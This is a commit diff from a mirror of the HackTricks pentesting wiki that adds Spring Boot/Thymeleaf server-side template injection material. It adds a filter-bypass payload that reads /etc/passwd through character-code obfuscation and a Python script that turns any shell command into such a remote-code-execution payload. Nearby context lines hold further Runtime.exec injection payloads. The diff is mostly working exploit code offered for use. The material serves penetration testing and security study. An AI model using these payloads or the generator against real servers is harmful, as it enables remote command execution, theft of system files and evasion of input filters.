mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
Added Springboot payload
Added spring boot payload generator script
This commit is contained in:
parent
e7323dcd0d
commit
4fc733fbde
1 changed files with 37 additions and 5 deletions
|
@ -249,7 +249,44 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
|
|||
```java
|
||||
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
|
||||
```
|
||||
**Bypass filters**
|
||||
|
||||
Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.
|
||||
- Read `/etc/passwd`
|
||||
```java
|
||||
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
||||
```
|
||||
- Custom Script for payload generation
|
||||
```python
|
||||
#!/usr/bin/python3
|
||||
|
||||
## Written By Zeyad Abulaban (zAbuQasem)
|
||||
# Usage: python3 gen.py "id"
|
||||
|
||||
from sys import argv
|
||||
|
||||
cmd = list(argv[1].strip())
|
||||
print("Payload: ", cmd , end="\n\n")
|
||||
converted = [ord(c) for c in cmd]
|
||||
base_payload = '*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec'
|
||||
end_payload = '.getInputStream())}'
|
||||
|
||||
count = 1
|
||||
for i in converted:
|
||||
if count == 1:
|
||||
base_payload += f"(T(java.lang.Character).toString({i}).concat"
|
||||
count += 1
|
||||
elif count == len(converted):
|
||||
base_payload += f"(T(java.lang.Character).toString({i})))"
|
||||
else:
|
||||
base_payload += f"(T(java.lang.Character).toString({i})).concat"
|
||||
count += 1
|
||||
|
||||
print(base_payload + end_payload)
|
||||
```
|
||||
**More Information**
|
||||
- [Thymleaf SSTI](https://javamana.com/2021/11/20211121071046977B.html)
|
||||
- [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#java---retrieve-etcpasswd)
|
||||
### Spring View Manipulation (Java)
|
||||
|
||||
```java
|
||||
|
@ -280,11 +317,6 @@ New version of Pebble :
|
|||
{% set cmd = 'id' %}
|
||||
{% endraw %}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
{% set bytes = (1).TYPE
|
||||
.forName('java.lang.Runtime')
|
||||
.methods[6]
|
||||
|
|
Loading…
Reference in a new issue